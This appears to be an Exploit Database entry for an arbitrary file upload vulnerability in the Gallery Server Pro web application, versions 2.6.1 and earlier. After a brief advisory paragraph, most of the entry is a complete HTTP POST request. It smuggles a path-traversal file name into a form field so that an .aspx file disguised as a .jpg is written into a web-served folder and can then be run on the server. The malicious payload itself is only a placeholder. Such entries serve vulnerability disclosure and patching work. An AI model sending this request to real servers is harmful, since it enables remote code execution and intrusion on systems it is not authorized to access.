Gallery Server Pro – Arbitrary File Upload

• Exploit Database
• 120 阅读

• 作者： Drew Calcott
  日期： 2013-05-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38511/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  source: https://www.securityfocus.com/bid/59831/info   Gallery Server Pro is prone to a vulnerability that lets attackers upload arbitrary files.   An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.   Gallery Server Pro 2.6.1 and prior are vulnerable.   ********************************************************************* POST /gallery/gs/handler/upload.ashx?aid=2 HTTP/1.1 Host: <vulnerablesite> Referer: http://www.example.com/gallery/default.aspx?g=task_addobjects&aid=2 Content-Length: 73459 Content-Type: multipart/form-data; boundary=---------------------------41184676334 Cookie: <VALID COOKIE DATA> Pragma: no-cache Cache-Control: no-cache   -----------------------------41184676334 Content-Disposition: form-data; name="name"   ..\..\gs\mediaobjects\Samples\malicious.aspx -----------------------------41184676334 Content-Disposition: form-data; name="file"; filename="malicious.jpg" Content-Type: application/octet-stream   Malicious code here.   -----------------------------41184676334-- *********************************************************************   The uploaded file will then be available on the affected server at: http://www.example.com/gallery/gs/mediaobjects/Samples/malicious.aspx